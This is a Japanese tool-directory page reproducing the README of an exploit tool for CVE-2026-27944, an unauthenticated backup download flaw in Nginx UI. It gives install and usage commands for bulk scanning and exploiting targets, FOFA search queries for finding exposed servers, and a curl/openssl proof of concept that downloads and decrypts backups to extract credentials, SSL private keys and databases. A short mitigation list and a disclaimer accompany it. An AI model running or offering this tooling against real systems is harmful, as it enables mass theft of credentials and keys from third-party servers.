Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Cve-2026-27944-Tools-Exploit — Suka suka lah | Kitploit
ツール/GitHubGitHub/bimabalance/cve-2026-27944-tools-exploit
偵察暗号化/復号化ツールパスワード攻撃脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集
GitHubbimabalance/cve-2026-27944-tools-exploit

Cve-2026-27944-Tools-Exploit

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Suka suka lah

リポジトリを見る
11ヶ月前未レビュー

🚀 CVE-2026-27944: Nginx UI 未認証バックアップエクスプロイト

📌 説明

27944.py は CVE-2026-27944 のエクスプロイトツールで、攻撃者が認証なしで Nginx UI のバックアップをダウンロードおよび復号化できるようにします。

この脆弱性は Nginx UI バージョン < 2.3.2 に存在し、以下へのアクセスを可能にします:

· ユーザー認証情報とセッショントークン · SSL 秘密鍵 · Nginx 設定 · データベースファイル

🔧 機能

· ✅ ターゲットファイルからの一括スキャン · ✅ 単一ターゲットのエクスプロイト · ✅ バックアップの自動ダウンロード · ✅ AES-256-CBC の自動復号化 · ✅ バックアップからの認証情報の自動抽出

🛠️ インストール方法

root@kitploit:~
git clone https://github.com/bimabalance/CVE-2026-27944.git
cd CVE-2026-27944
pip install -r requirements.txt

🚀 使用方法

  1. 一括スキャン
root@kitploit:~
python 27944.py -f targets.txt -o hasil_scan
  1. 単一ターゲットのエクスプロイト
root@kitploit:~
python 27944.py -t target.com:9000 --exploit --decrypt
  1. 完全エクスプロイト
root@kitploit:~
python 27944.py -f targets.txt --exploit --decrypt -o hasil_full

📋 ターゲット形式

root@kitploit:~
target1.com:9000
192.168.1.1:9000
target2.com:8080

🎯 FOFA ダーク

root@kitploit:~
title="Nginx UI"
icon_hash="-1565173320"
header="X-Backup-Security"
body="Nginx UI" && port="9000"
title="Nginx UI" && country="ID"

📂 出力結果

root@kitploit:~
results/
├── results.json
├── target_backup.bin
├── target_backup_decrypted.zip
└── target_extracted/
    ├── app.ini
    ├── database.db
    ├── nginx.conf
    └── ssl/

⚠️ 免責事項

このツールは教育目的および倫理的なセキュリティテストのために作成されました。作者はこのツールの誤用について一切の責任を負いません。所有するシステム、またはテストする書面による許可があるシステムでのみ使用してください。

📝 技術的説明

CVE-2026-27944 は Nginx UI の重大な脆弱性で、攻撃者が認証なしで /api/backup エンドポイントにアクセスできるようにします。バックアップには AES-256 で暗号化された機密データが含まれていますが、キーと IV は X-Backup-Security ヘッダーで Base64 形式で送信されます。

CVSS スコア: 9.8 (Critical)

影響を受けるバージョン: Nginx UI < 2.3.2

緩和策:

  1. Nginx UI v2.3.3 にアップグレード
  2. /api/backup へのアクセスをブロック
  3. すべての認証情報をローテーション

💀 POC

root@kitploit:~
# Cek vulnerability
curl -I http://target:9000/api/backup

# Download backup
curl -s http://target:9000/api/backup -o backup.bin

# Decrypt backup (manual)
openssl enc -d -aes-256-cbc -base64 -K <key> -iv <iv> -in backup.bin -out backup_decrypted.zip
ツールをダウンロード